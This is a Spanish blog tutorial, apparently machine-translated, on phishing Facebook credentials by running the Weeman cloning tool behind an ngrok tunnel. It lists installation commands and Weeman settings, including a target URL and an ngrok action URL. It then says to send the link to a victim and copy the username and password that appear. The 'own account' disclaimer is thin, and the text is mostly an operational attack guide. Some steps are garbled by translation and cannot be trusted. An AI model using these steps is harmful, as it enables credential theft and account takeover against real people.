Saltar al contenido

Weeman + ngrok: ataque de phishing en cuentas de Facebook

Además de PhisherMan + ngrok, como se vio en un tutorial anterior en este sitio, existen otras alternativas. Especial Pequeño hombre, que en combinación con ngrok podrá realizar ataques de phishing en cuentas de la famosa red social Facebook y otras redes sociales. Una manera fácil de obtener credenciales de cuenta sin la necesidad de ataques de fuerza bruta que consumen mucho tiempo, etc.

Usa este tutorial para practicar con él. técnica de piratería para aprender de ellos o para realizar auditorías de seguridad en sus propias cuentas de Facebook para verificar su efectividad.

En este sitio no fomentamos el uso de este tipo de herramientas con fines fraudulentos. Recuerda que robar cuentas de otros puede ser un delito y no nos hacemos responsables de ello.

Lo que deberías saber ¿Weeman + Ngrok?

Con Weeman y Ngrok Tienes todo lo que necesitas para realizar ataques de phishing en cuentas de Facebook. Es decir, crea tu propio servidor de phishing para hacerse pasar por Facebook (o cualquier otro) y el usuario propietario de la red social pincha en la trampa e introduce las credenciales que te envían de forma remota.

Weeman es impulsado por pythonn y puede asegurarse de que tiene un servidor HTTP para este ejercicio. Por otro lado, Ngrok garantiza la creación de un túnel entre el servidor y la víctima para su transmisión.

Instala lo necesario

Si aún no lo tienes Amueblado todo lo que necesita en linux puede seguir estos sencillos pasos para obtener weeman y ngrok.

Los pasos comienzan con Instalar Ngrok:

  1. Descargar Ngroksupongamos que está en Descargas.
  2. Ahora cambie al directorio de descarga: descargas de CD
  3. Ejecute el siguiente comando desde el directorio donde lo descargó: Extraer /ruta/a/ngrok.zip
  4. Cambie el directorio extraído a la ruta correcta: sudo cp /home/usuario/Descargas/ /usr/bin

Ahora es tu turno Es el turno de Weeman:

  1. Descargue Weeman desde GitHub (debe tener Git instalado para ejecutar este comando en GNU/Linux): Clona Git https://github.com/samyoyo/weeman.git
  2. Ir al directorio de descarga: CD Weeman
  3. Ahora otorgue permisos de ejecución al script de Python: chmod +x weeman.py
  4. Ejecute Weeman con: python weeman.py
  5. Finalmente y ahora deja que muestre el menú de opciones para empezar: Demostrar
  6. No cierres la ventana de la terminal, te servirá más tarde.

Recuerda sustituir las rutas por las adecuadas en tu caso…

Uso de Weeman + ngrok para obtener credenciales de redes sociales

Weeman + ngrok: Facebook

Para empezar a utilizar estos proyectos, los pasos son igual de fáciles:

  1. Ahora deje abierta la ventana en la que está ejecutando Weeman y abra otra ventana o pestaña de terminal por separado.
  2. En él, ejecuta los comandos necesarios para iniciar el servidor con ngrok:
    • ngrok http-bind-tls=true 8080
    • Establecer la URL https://facebook.com
    • establecer acción_url xxx_ngrok.io
    • Establecer puerto 8080
    • correr
  3. Regrese a la ventana de Weman y comience a ingresar los parámetros solicitados para la cuenta de la red social que desea atacar (url de la red social, puerto, url generada con ngrok…):
    • Establecer URL https://www.facebook.com/
    • Establecer puerto 8080
    • establecer action_url 49b97fbe.ngrok.io (la url de ngrok, recuerda ingresar la que más te convenga)
    • Demostrar (mostrar de nuevo los campos, comprobar que están todos cumplimentados y correctos)
  4. Ahora todo está configurado. Todo lo que tiene que hacer es enviar la URL generada por ngrok a la víctima o al objetivo de auditoría y esperar a que haga clic en la trampa e ingrese su nombre de usuario y contraseña.
  5. Una vez que lo haga, el nombre de usuario y la contraseña se mostrarán en la pantalla para que los copie.